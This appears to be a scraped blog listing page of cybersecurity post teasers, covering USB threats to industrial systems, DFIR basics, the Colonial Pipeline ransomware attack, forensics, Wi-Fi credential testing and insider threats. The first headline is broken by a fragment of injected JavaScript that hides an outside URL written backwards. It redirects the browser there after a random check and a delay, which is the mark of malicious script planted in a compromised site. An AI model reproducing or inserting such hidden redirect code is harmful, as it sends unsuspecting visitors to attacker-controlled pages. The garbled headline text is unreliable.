Report: USB threats toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to ICS systems have nearly doubled
The latest Honeywell USB Threat Report 2020 indicates that the number of threats specifically targeting Operational Technology systems has... read more
DFIR Briefly Expained – Part 2
Before we begin with learning how to collect digital evidence we first need to talk about “scope.” Scoping is... read more
Industrial Cybersecurity: Guidelines for Protecting Critical Infrastructure
Over the weekend, the Alpharetta-based Colonial Pipeline was hit by an extensive ransomware attack that shut down its information... read more
The State of Digital Forensics
Digital forensics is an important tool in the fight against crime in the current digital age. It is also... read more
DFIR Briefly Expained – Part 1
Since we are going to be learning in future blog posts the specifics of Digital Forensics & Incident Response... read more
Dangers of digital evidence
Here is what law enforcement is saying about the issue of contaminated digital devices. “When I was a detective and... read more
Enterprise WIFI Hacking with Hostapd-WPE
Recently we have been on Wireless Pentest with end goal to compromise the credentials of the end user and... read more
Tough Economy Heightens Insider Threat
As companies downsize, they need to keep an eye out for disgruntled employees With a faltering economy resulting in increased... read more